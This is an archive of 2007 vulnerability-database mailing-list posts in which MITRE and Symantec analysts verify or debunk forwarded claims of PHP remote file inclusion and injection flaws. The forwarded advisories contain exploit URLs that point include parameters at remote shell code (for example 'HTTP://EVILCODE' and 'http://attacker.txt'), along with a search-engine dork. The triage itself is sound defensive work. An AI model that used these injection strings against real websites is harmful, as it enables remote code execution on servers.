PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE? google dork: "powered by sazcart" From coley at mitre.org Wed Jan 10 21:17:40 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 21:17:40 -0500 (EST) Subject: [VIM] source verify - Axiom RFI Message-ID: <200701110217.l0B2HeEE004148@faron.mitre.org> Researchers: Dr.Pantagon / Dr.Trojan (DeltahackingTEAM) Ref: http://www.milw0rm.com/exploits/3108 Specified download simply checks that $baseAxiomPath is non-empty before using it: if (!isset($baseAxiomPath) || strlen($baseAxiomPath) == 0) { Header("Location: index.php"); die(); } include_once($baseAxiomPath . "/themes/sickphp/theme.php"); So, looks legit. - Steve From rkeith at securityfocus.com Fri Jan 12 09:58:32 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Fri, 12 Jan 2007 07:58:32 -0700 (MST) Subject: [VIM] bogus [Fwd: microBlog <= (config_file) Remote File Include Vulnerability] (fwd) Message-ID: The email quotes why it is bogus in fact. $config_file = "./config.php"; include "{$config_file}"; This was not posted to Bugtraq, just forwarding for information purposes. -- Rob Keith Symantec -------- Original Message -------- Subject: microBlog <= (config_file) Remote File Include Vulnerability Date: Sat, 06 Jan 2007 04:51:46 +0300 From: Mr.3FReeT HaCKer Mr.3FReeT HaCKer To: webmaster at securityfocus.com CC: listadmin at securityfocus.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= microBlog <= (config_file) Remote File Include Vulnerability Found By : Mr.3FReeT Risk : High Class : Remote File Include URL : http://www.hotscripts.com/jump.php?listing_id=53733&jump_type=1 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Code in : index.php , rss.php , upgrade.php $config_file = "./config.php"; include "{$config_file}"; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ExploiT :. ^^^^ www.site.com/[path]/index.php?config_file=shellcode.txt? www.site.com/[path]/rss.php?config_file=shellcode.txt? www.site.com/[path]/upgrade.php?config_file=shellcode.txt? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GReeTz To : [ Dr.2 ] , [ Asbmay ] , [ General C ] , [ Q8^RoCK ] , And Dmar7 TeaM =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ From rkeith at securityfocus.com Fri Jan 12 10:06:47 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Fri, 12 Jan 2007 08:06:47 -0700 (MST) Subject: [VIM] bogus [Fwd: myBloggie <= (bloggie_root_path) Remote File Include Vulnerability] (fwd) Message-ID: Most of the files each predefine the 'bloggie_root_path' parameter. In index.php: $bloggie_root_path = ""; In genscode.php: $bloggie_root_path = './'; And there is anti-hacking code to make sure 'index.php' is called: if ( !defined('IN_BLOGGIE') ) { die("Hacking attempt"); } -- Rob Keith Symantec -------- Original Message -------- Subject: myBloggie <= (bloggie_root_path) Remote File Include Vulnerability Date: Sat, 06 Jan 2007 04:31:27 +0300 From: Mr.3FReeT HaCKer Mr.3FReeT HaCKer To: webmaster at securityfocus.com CC: listadmin at securityfocus.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= myBloggie <= (bloggie_root_path) Remote File Include Vulnerability Found By : Mr.3FReeT Risk : High Class : Remote File Include URL : http://mywebland.com/dl.php?id=20 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Code in : index.php , genscode.php , init.php ..... > May be all :) < include_once($bloggie_root_path.'config.php'); include_once($bloggie_root_path.'includes/db.php'); include_once($bloggie_root_path.'includes/template.php'); include_once($bloggie_root_path.'includes/functions.php'); include_once($bloggie_root_path.'includes/function-format.php'); include_once($bloggie_root_path.'includes/classes.php'); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit :. ^^^^ www.site.com/[path]/index.php?bloggie_root_path=shellcode.txt? www.site.com/[path]/init.php?bloggie_root_path=shellcode.txt? www.site.com/[path]/genscode.php?bloggie_root_path=shellcode.txt? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GreeTz to : [ Dr.2 ] , [ Asbmay ] , [ General C ] , [ Qt^RoCK ] , All Dmar7 Team .... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ From heinbockel at mitre.org Fri Jan 12 13:18:55 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Fri, 12 Jan 2007 13:18:55 -0500 Subject: [VIM] Source Verify of LunarPoll PollDir RFI Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC017D819B@IMCSRV5.MITRE.ORG> Researcher: ilker Kandemir BUGTRAQ:20070112 LunarPoll (PollDir) Remote File Include Vulnerabilities http://www.securityfocus.com/archive/1/archive/1/456697/100/0/threaded Claim: RFI in the PollDir parameter in show.php Source, show.php, lines 1-5: > echo "\n\n\n\n\n"; > // Includes the functions > require_once($PollDir.'/includes/functions.php'); > require_once($PollDir.'/includes/IO.php'); William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From rkeith at securityfocus.com Fri Jan 12 15:10:58 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Fri, 12 Jan 2007 13:10:58 -0700 (MST) Subject: [VIM] [Bogus - partly] V TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability (fwd) Message-ID: http://www.milw0rm.com/exploits/3118 Half of this is bogus. In i-index.php the $chemin parameter is clearly defined. However in the i-accueil.php script this appears legit. In i-index.php: Line 12: $chemin = "." ; -- Rob Keith Symantec From str0ke at milw0rm.com Fri Jan 12 15:38:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 12 Jan 2007 14:38:55 -0600 Subject: [VIM] [Bogus - partly] V TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability (fwd) In-Reply-To: References: Message-ID: <814b9d50701121238w243a09c0q517ded3bb294d7d6@mail.gmail.com> Rob, I didn't even see the i-index.php mentioned in his short advisory. Removed the 50 percent that wasn't working. /str0ke On 1/12/07, rkeith at securityfocus.com wrote: > http://www.milw0rm.com/exploits/3118 > > Half of this is bogus. In i-index.php the $chemin parameter is clearly > defined. However in the i-accueil.php script this appears legit. > > In i-index.php: > Line 12: $chemin = "." ; > > -- > Rob Keith > Symantec > From str0ke at milw0rm.com Fri Jan 12 16:59:35 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 12 Jan 2007 15:59:35 -0600 Subject: [VIM] Fwd: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability In-Reply-To: References: Message-ID: <814b9d50701121359m54561b07v8b3f8ba8e7066c2a@mail.gmail.com> Naig doesn't seem vulnerable since $this_path is set with the line below. $this_path = substr($_SERVER["SCRIPT_FILENAME"],0,max(strrpos($_SERVER["SCRIPT_FILENAME"],"/"),strrpos($_SERVER["SCRIPT_FILENAME"],"\\"))+1); /str0ke ---------- Forwarded message ---------- From: me you Date: Jan 12, 2007 3:50 PM Subject: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability To: bugtraq at securityfocus.com Cc: submit at milw0rm.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Naig <= 0.5.2 (this_path) Remote File Include Vulnerability Script : Naig Version : 0.5.2 URL : http://mesh.dl.sourceforge.net/sourceforge/naig/naig-0.5.2.zip Found By : -= BorN To K!LL =- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= code in : index.php require($this_path."config.inc.php"); require($this_path."Naig-includes/naig.inc.php"); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exlo!t :. ^^^^ www.site.com/[path]/index.php?this_path=shellcode.txt? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GreeTz to : Dr.2 , Asbmay , ToOoFa , Q8^RoCK , SHiKaA .... All My friends .. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ From jericho at attrition.org Sat Jan 13 07:36:21 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 13 Jan 2007 07:36:21 -0500 (EST) Subject: [VIM] Interesting advisory comments and timeline In-Reply-To: <200701110012.l0B0CrLm002681@faron.mitre.org> References: <200701110012.l0B0CrLm002681@faron.mitre.org> Message-ID: : http://www.mnin.org/advisories/2007_firepass.pdf : : "For reasons withheld, this advisory will not contain details on : vulnerable versions of FirePass. However, this information should : certainly be available from the vendor's website. We would suggest : creating a portal account and viewing the F5 CERT advisories and : vulnerabilities page." : : Jul 2006 Discovered and reported a majority of vulnerabilities : Long story, don.t ask. Which screams.. "ask". Has anyone? From rkeith at securityfocus.com Mon Jan 15 10:04:19 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Mon, 15 Jan 2007 08:04:19 -0700 (MST) Subject: [VIM] [Bogus] [ilkerkandemir@mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability] (fwd) Message-ID: The tc_config parameter is clearly defined in the config.php; file which is called at the beginning of every script. ---------- Forwarded message ---------- Date: Sat, 13 Jan 2007 10:00:46 -0700 From: Teo Adams Subject: [Bogus] V [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability] All of these scripts include a config file that sanitizes the reported parameter. > ----- Forwarded message from ilkerkandemir at mynet.com ----- > > From: ilkerkandemir at mynet.com > Subject: Trevorchan <= v0.7 Remote File Include Vulnerability > To: bugtraq at securityfocus.com > Date: 13 Jan 2007 11:33:28 -0000 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > Message-ID: <20070113113328.6236.qmail at securityfocus.com> > > > ------------------------------------------------------------------------------------------------------------------- > > AYYILDIZ.ORG PreSents... > > > > Script:Trevorchan v0.7 > Download: http://rel.trevorchan.org/Releasev07.zip > > Contact: ilker Kandemir > > > > Code: > require_once($tc_config['rootdir']."/inc/functions.php"); > require_once($tc_config['rootdir']."/inc/encryption.php"); > > > ------------------------------------------------------------------------------------------------------------------- > > Exploit: upgrade.php?tc_config[rootdir]=http://attacker.txt? > paint_save.php?tc_config[rootdir]=http://attacker.txt? > menu.php?tc_config[rootdir]=http://attacker.txt? > manage.php?tc_config[rootdir]=http://attacker.txt? > banned.php?tc_config[rootdir]=http://attacker.txt? > > ------------------------------------------------------------------------------------------------------------------- > > Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR > Special Tnx: AYYILDIZ.ORG > > ----- End forwarded message ----- > -- Rob Keith Symantec From rkeith at securityfocus.com Tue Jan 16 13:18:29 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Tue, 16 Jan 2007 11:18:29 -0700 (MST) Subject: [VIM] [bogus] Re: V [r.5.7@hotmail.com: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability] (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 16 Jan 2007 10:11:26 -0700 (MST) From: pjungles at securityfocus.com Subject: [bogus] Re: V [r.5.7 at hotmail.com: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability] (fwd) Install checks for register_global on and magic quotes... The script set it to $phpbb_root_path = "./" before including. New version as well as the version reported vuln. PJ > > ----- Forwarded message from me you ----- > > From: "me you" > Subject: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include > Vulnerability > To: submit at milw0rm.com > Cc: bugtraq at securityfocus.com > Date: Tue, 16 Jan 2007 13:52:57 +0000 > Message-ID: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability > > Script : Gallery > > Version : 1.4.4-pl4 > > URL : > http://puzzle.dl.sourceforge.net/sourceforge/gallery/gallery-1.6-alpha3.tar.gz > > Author : BorN To K!LL > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > Code in :. contrib/phpBB2/modules.php > > include_once($phpbb_root_path . 'extension.inc'); > include_once($phpbb_root_path . 'common.'.$phpEx); > include_once($phpbb_root_path . 'includes/functions.'.$phpEx); > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > Explo!t :. > ^^^^^ > www.site.com/[path]/contrib/phpBB2/modules.php?phpbb_root_path=shellcode.txt? > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > GreeTz to : Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke > ... > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > _________________________________________________________________ > Don't just search. Find. Check out the new MSN Search! > http://search.msn.click-url.com/go/onm00200636ave/direct/01/ > > > ----- End forwarded message ----- > -- Rob Keith Symantec From coley at linus.mitre.org Wed Jan 17 16:08:41 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 17 Jan 2007 16:08:41 -0500 (EST) Subject: [VIM] grsecurity/PaX dispute of Digital Armaments claims Message-ID: There was a followup to Bugtraq I know, but here's something more direct: http://grsecurity.net/news.php#digitalfud "The company in question is the same company that claimed a Linux 2.6.x remote root which never came to fruition... As the PaX team has mentioned on the forums (see http://forums.grsecurity.net/viewtopic.php?t=1643), the function they claim the vulnerability to be in is a trivial function, which can, and has been, easily checked for any supposed vulnerabilities... it can safely be said that these vulnerability claims are pure attention-seeking FUD for a shady company." - Steve ====================================================== Name: CVE-2007-0253 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0253 Reference: MISC:http://forums.grsecurity.net/viewtopic.php?t=1646 Reference: MISC:http://grsecurity.net/news.php#digitalfud Reference: MISC:http://www.digitalarmaments.com/news_news.shtml ** DISPUTED ** Unspecified vulnerability in the grsecurity patch has unspecified impact and remote attack vectors, a different vulnerability than the expand_stack vulnerability from the Digital Armaments 20070110 pre-advisory. NOTE: the grsecurity developer has disputed this issue, stating that "the function they claim the vulnerability to be in is a trivial function, which can, and has been, easily checked for any supposed vulnerabilities." The developer also cites a past disclosure that was not proven. ====================================================== Name: CVE-2007-0257 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0257 Reference: BUGTRAQ:20070111 Digital Armaments Security Pre-Advisory 11.01.2007: Grsecurity Kernel PaX - Local root vulnerability Reference: URL:http://www.securityfocus.com/archive/1/archive/1/456626/100/0/threaded Reference: MISC:http://forums.grsecurity.net/viewtopic.php?t=1646 Reference: MISC:http://grsecurity.net/news.php#digitalfud Reference: MISC:http://www.digitalarmaments.com/news_news.shtml Reference: MISC:http://www.digitalarmaments.com/pre2007-00018659.html Reference: BID:22014 Reference: URL:http://www.securityfocus.com/bid/22014 Reference: FRSIRT:ADV-2007-0155 Reference: URL:http://www.frsirt.com/english/advisories/2007/0155 Reference: SECUNIA:23713 Reference: URL:http://secunia.com/advisories/23713 ** DISPUTED ** Unspecified vulnerability in the expand_stack function in grsecurity PaX allows local users to gain privileges via unspecified vectors. NOTE: the grsecurity developer has disputed this issue, stating that "the function they claim the vulnerability to be in is a trivial function, which can, and has been, easily checked for any supposed vulnerabilities." The developer also cites a past disclosure that was not proven. From coley at mitre.org Wed Jan 17 18:54:08 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 17 Jan 2007 18:54:08 -0500 (EST) Subject: [VIM] Source VERIFY of SMe FileMailer 1.21 SQL injection Message-ID: <200701172354.l0HNs8w1027636@faron.mitre.org> Researcher: CorryL Ref: BUGTRAQ:20070116 [x0n3-h4ck] SmE FileMailer 1.21 Remote Sql http://www.securityfocus.com/archive/1/archive/1/457071/100/0/threaded Product url: http://www.scriptme.com/down/13 The 'ps' parameter is listed. from the index.php: if(isset($_POST['s1'])){ $q1 = "select * from sme_members where name = '$_POST[us]' and password = '$_POST[ps]'"; $r1 = mysql_query($q1) or die(mysql_error()); Obviously the 'us' parameter looks vulnerable too. - Steve From theall at tenablesecurity.com Wed Jan 17 19:25:16 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 17 Jan 2007 19:25:16 -0500 Subject: [VIM] Question about BEA07-155.00 Message-ID: <45AEBE6C.1030601@tenablesecurity.com> About the recently announced flaw in BEA's JRockit... BEA07-155.00 talks about JRocket 1.4.2 R4.5 as affected and says to upgrade to JRockit 1.4.2 R6.4. Is anyone familiar with the product? Are those version numbers correct? I failed to find any reference to those version numbers on BEA's site anywhere but in their advisory. Instead, I see versions such as "1.4.2 R24.0", "1.4.2 R26.5", 1.4.6 R27.1" (which is the current one in the 1.4.2 product line). support at bea.com's only response to my query has been to tell me to register on their customer support portal. :-( George -- theall at tenablesecurity.com From coley at mitre.org Thu Jan 18 18:55:43 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 18 Jan 2007 18:55:43 -0500 (EST) Subject: [VIM] vendor ACK for MGB Guestbook issue Message-ID: <200701182355.l0INthWr014316@faron.mitre.org> Researcher: SlimTim10 Ref: http://www.milw0rm.com/exploits/3141 Today Jan 18, the vendor site is: http://www.tv-kritik.net/mgb/index.php A google translation says: "18.01.2007 | MGB 0.5.4.6 publishes SAFETY UPDATE/SECURITY UPDATES... the hacker attacks of yesterday forced me briefly before the publication of the MGB 0,6 to it. The safety gap over the hackers entrance created myself, I eliminated." Previous posts have similar related discussion. A diff between 0.5.4.5 and 0.5.4.6 was rather extensive, but review of email.php shows: > $getid = htmlspecialchars(stripslashes(strip_tags(trim($_GET[id]))), ENT_QUOTES); 20c23 ... < $sql="SELECT email, name FROM $db[entrys] WHERE id=".$_GET[id]." ORDER BY ID DESC"; ... > $query = "SELECT email, name FROM $db[entrys] WHERE id='".$getid."' LIMIT 1"; which is obviously intended to cleanse the id parameter from email.php, although the use of htmlspecialchars in an SQL query seems prone to error. - Steve From coley at mitre.org Thu Jan 18 19:16:32 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 18 Jan 2007 19:16:32 -0500 (EST) Subject: [VIM] source verify: Uberghey CMS 0.3.1 RFI Message-ID: <200701190016.l0J0GWBf014561@faron.mitre.org> Researcher: GolD_M = Mahmood_ali Ref: http://www.milw0rm.com/exploits/3147 The referenced include() statement is the first executable statement in the 0.3.1 source code for frontpage.php. - Steve From dm at securityfocus.com Fri Jan 19 17:07:21 2007 From: dm at securityfocus.com (dm at securityfocus.com) Date: Fri, 19 Jan 2007 15:07:21 -0700 Subject: [VIM] [bogus RFI] [k3g@hackermail.com: b2evolution 1.9.1] Message-ID: <20070119220721.GV27939@securityfocus.com> Hey, Just rejected a report to Bugtraq. This one already got debunked, see: http://www.securityfocus.com/archive/1/444900 So a repeat of an old bogus report. ----- Forwarded message from mr alkomandoz ----- From: "mr alkomandoz" Subject: b2evolution 1.9.1 To: bugtraq at securityfocus.com Date: Sat, 20 Jan 2007 06:10:22 +0800 Message-Id: <20070119221022.CC37BB0FEF at ws4-4.us4.outblaze.com> ----------------------------------------------- b2evolution 1.9.1 Remote File Include Vulnerablity ----------------------------------------------- Author: Alk()mand()z ----------------------------------------------- Code: require_once $inc_path.'_main.inc.php'; ----------------------------------------------- 3xplo!t: blogs/index.php?inc_path=[Evil-Code] ----------------------------------------------- download: http://sourceforge.net/project/downloading.php?groupname=evocms&filename=b2evolution-1.9.1-2006-12-02.zip&use_mirror=heanet ----------------------------------------------- Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team ################################################### # AsB-MaY.NeT & D4eG.OrG ################################################### -- _______________________________________________ Get your free email from http://www.hackermail.com ----- End forwarded message ----- -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at mitre.org Mon Jan 22 12:01:47 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 22 Jan 2007 12:01:47 -0500 (EST) Subject: [VIM] a-forum xss - who? what? where? Message-ID: <200701221701.l0MH1lGM027245@faron.mitre.org> Forgive me for channelling Vinnie Barbarino from an old 70's US show... Researcher: sn0oPy Ref: BUGTRAQ:20070119 a-forum xss http://www.securityfocus.com/archive/1/archive/1/457503/100/0/threaded sn0oPy gives a google-dork URL that shows a number of French web sites that apparently have the relevant program. But the vendor site, www.mistersp.com, doesn't say anything about "a-forum" and a view-source of some of the google-dork'ed sites doesn't point to this, either. So, who developed what product? - Steve From coley at mitre.org Mon Jan 22 20:05:11 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 22 Jan 2007 20:05:11 -0500 (EST) Subject: [VIM] old OdysseusBlog XSS report - possibly incorrect Message-ID: <200701230105.l0N15B7Y007250@faron.mitre.org> Researcher: the_Edit0r Ref: BUGTRAQ:20061116 OdysseusBlog => 1.0.0 Cross Site Scripting http://archives.neohapsis.com/archives/bugtraq/2006-11/0274.html I downloaded OdysseusBlog 1.0.0 and looked at the source. We have a couple examples like this: > $pid = $_GET['page']; > >... > $next = "

<< Previous 5 | Next 5 >>

"; $pid +- 1 would evaluate to 1 or -1, so this looks faulty. Maybe there's a detailed error reporting level that would spit out a message, but E_ALL didn't work for me. And even so, you get into XSS within PHP's error reporting itself, whatever that bug was that they fixed about a year ago. - Steve From rkeith at securityfocus.com Tue Jan 23 15:57:59 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Tue, 23 Jan 2007 13:57:59 -0700 (MST) Subject: [VIM] [bogus] [r.5.7@hotmail.com: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability] (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 23 Jan 2007 10:03:34 -0700 (MST) From: Ashif Samnani Subject: re: [review]V [r.5.7 at hotmail.com: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability] (fwd) Not Vuln In index.php $include_path = dirname(__FILE__); require_once $include_path."/admin/config.inc.php"; require_once $include_path."/lib/$DB_CLASS"; require_once $include_path."/lib/image.class.php"; require_once $include_path."/lib/template.class.php"; In addentry.php $include_path = dirname(__FILE__); require_once $include_path."/admin/config.inc.php"; require_once $include_path."/lib/$DB_CLASS"; require_once $include_path."/lib/image.class.php"; require_once $include_path."/lib/template.class.php"; require_once $include_path."/lib/vars.class.php"; require_once $include_path."/lib/add.class.php"; require_once $include_path."/lib/phrase.class.php"; In picture.php $include_path = dirname(__FILE__); require_once $include_path."/admin/config.inc.php"; Looks like include_path is being defined in all three cases. Note: This reporter has been reporting bogus RFI;s on bugtraq i think this is the third time i've seen him doing this. Ashif ----- Forwarded message from me you ----- From: "me you" Subject: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability To: submit at milw0rm.com Cc: bugtraq at securityfocus.com Date: Tue, 23 Jan 2007 08:52:30 +0000 Message-ID: ################################################### Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability Script: Advanced Guestbook Version: 2.4.2 URL: http://proxy2.de/js/dl86d7a2.php Found By : BorN To K!LL ################################################### Bug in : index.php , addentry.php , picture.php code :. require_once $include_path."/admin/config.inc.php"; require_once $include_path."/lib/$DB_CLASS"; require_once $include_path."/lib/image.class.php"; require_once $include_path."/lib/template.class.php"; ################################################### Explo!T: ^^^^^ /index.php?include_path=[SHe1L-CoDe] /addentry.php?include_path=[SHe1L-CoDe] /picture.php?include_path=[SHe1L-CoDe] ################################################### GreeTz :. Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , ThE-LoRd-Of-CrAcKiNg , str0ke .. ################################################### _________________________________________________________________ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ----- End forwarded message ----- -- Rob Keith Symantec From coley at linus.mitre.org Wed Jan 24 18:15:27 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 24 Jan 2007 18:15:27 -0500 (EST) Subject: [VIM] a-forum xss - who? what? where? In-Reply-To: <200701221701.l0MH1lGM027245@faron.mitre.org> References: <200701221701.l0MH1lGM027245@faron.mitre.org> Message-ID: from a CVE analyst who decided to dig a little deeper... ACCURACY: The script can be downloaded from www.phpscripts-fr.net/scripts/script.php?id=346. On this page, there is a house icon that points to www.mistersp.com, suggesting that the author of this www.phpscripts-fr.net page believed that www.mistersp.com was the home web site associated with the script. This was not directly confirmed. This page also says "A-Forum par Arnaud Guyonne." The domain registrant for mistersp.com is Danielle Guyonne (same last name). The download contains "Copyright Arnotic 1999 - 2000." According to forum.kimsufi.com/member.php?u=177, Arnaud Guyonne uses the nickname Arnotic. Thus, the contents of the download map to the name Guyonne, and thus map (given an apparent family connection) to mistersp.com. ACCURACY: psuedo was a misspelling by the researcher. From rkeith at securityfocus.com Sat Jan 27 15:38:36 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Sat, 27 Jan 2007 13:38:36 -0700 (MST) Subject: [VIM] [bogus] [trzindan@hotmail.fr: local Calendar System v1.1 (lcStdLib.inc) Remote File Include] (fwd) Message-ID: Every single script has the first line as: include("./config.php"); That file clearly defines the parameters with hardcoded data. -- Rob Keith Symantec ---- Forwarded message from trzindan at hotmail.fr ----- From: trzindan at hotmail.fr Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include To: bugtraq at securityfocus.com Date: 27 Jan 2007 17:46:55 -0000 X-Mailer: MIME-tools 5.411 (Entity 5.404) Message-ID: <20070127174655.27269.qmail at securityfocus.com> +------------------------------------------------------------------------------------------- local Calendar System v1.1 (lcStdLib.inc) Remote File Include Tr_ZiNDaN trzindan at hotmail.fr Turkey -------------------------------------------------------------------------------------------- download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz -------------------------------------------------------------------------------------------- code : require "$TEMPLATE_DIR/header.inc"; require("$LIBDIR/lcStdLib.inc"); require("$LIBDIR/lcUser.php"); require ("$LIBDIR/lcGroup.inc"); require("$LIBDIR/lcCal.inc"); require("$LIBDIR/Calendar.inc"); require("$LIBDIR/lcErrorChecker.inc"); include ("$TEMPLATE_DIR/navbar.php"); include("$TEMPLATE_DIR/footer.inc"); -------------------------------------------------------------------------------------------- exploit: local/showinvoices.php?TEMPLATE_DIR=shell? local/editevent.php?LIBDIR=shell? local/resetpassword.php?LIBDIR=shell? local/signup.php?LIBDIR=shell? local/showmonth.php?TEMPLATE_DIR=shell? local/showmonth.php?LIBDIR=shell? local/showday.php?LIBDIR=shell? local/showevents.php?LIBDIR=shell? local/showevents.php?TEMPLATE_DIR=shell? local/retrieveinvoice.php?TEMPLATE_DIR=shell? local/modifyitem.php?TEMPLATE_DIR=shell? local/lookup_userid.php?LIBDIR=shell? local/lookup_userid.php?TEMPLATE_DIR=shell? -------------------------------------------------------------------------- Thanx str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy.. ------------------------------------------------------------------------- ##---ALL MusLim Hackers------------------------------------------------------------------------------------------------ ----- End forwarded message --- From rkeith at securityfocus.com Mon Jan 29 12:27:46 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Mon, 29 Jan 2007 10:27:46 -0700 (MST) Subject: [VIM] [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion] (fwd) Message-ID: This report came up on the weekend and had some conflicting data. The version was wrong for the software specified, and the scipt didnt exist. This new report points to the correct software. However, the report is still bogus as a configruation file (globals.php) called at the beginning of the script clearly defines the specified vulnerable parameter. -- Rob Keith Symantec ----- Forwarded message from Micha? Melewski ----- From: =?UTF-8?Q?Micha=C5=82?= Melewski Subject: Re: Open Conference Systems = 2.8.2 Remote File Inclusion To: trzindan at hotmail.com Cc: bugtraq at securityfocus.com Date: Sat, 27 Jan 2007 21:55:56 +0100 X-Mailer: Evolution 2.8.2.1 Message-Id: <1169931357.8362.3.camel at localhost> Dnia 27-01-2007, sob o godzinie 12:52 +0000, trzindan at hotmail.com napisa?(a): > ######################################################################### > # Open Conference Systems <= 2.8.2 Remote File Inclusion > # Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz > # > # Found By : Tr_ZiNDaN > # Location : TurkeY -- #trzindan at hotmail.fr > ######################################################################## This bug has nothing to do with Open Conference System. This is a bug in OpenEMR 